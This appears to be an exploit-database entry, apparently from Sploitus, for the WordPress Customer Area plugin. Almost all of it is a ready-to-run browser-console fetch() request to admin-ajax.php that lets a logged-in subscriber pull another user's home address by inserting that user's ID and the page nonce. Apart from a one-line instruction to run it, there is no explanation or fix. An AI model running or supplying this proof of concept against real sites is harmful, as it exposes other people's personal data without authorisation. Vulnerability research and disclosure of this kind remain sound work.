Share
## https://sploitus.com/exploit?id=WPEX-ID:A224B984-770A-4534-B689-0701B582B388
Run the below command in the developer console of the browser when being logged in the blog as a subscriber and on your own edit account page (https://example.com/customer-area/my-account/edit-account/):

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
      "body": "action=cuar_load_address_from_owner&owner[type]=usr&owner[ids][]=__ADD_USER_ID__&address_id=home_address&cuar_nonce=" + document.querySelector('div.cuar-home-address input#cuar_nonce').value,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
}).then((response) => {return response.text();    })
    .then((data) => {
      console.log(data);
    });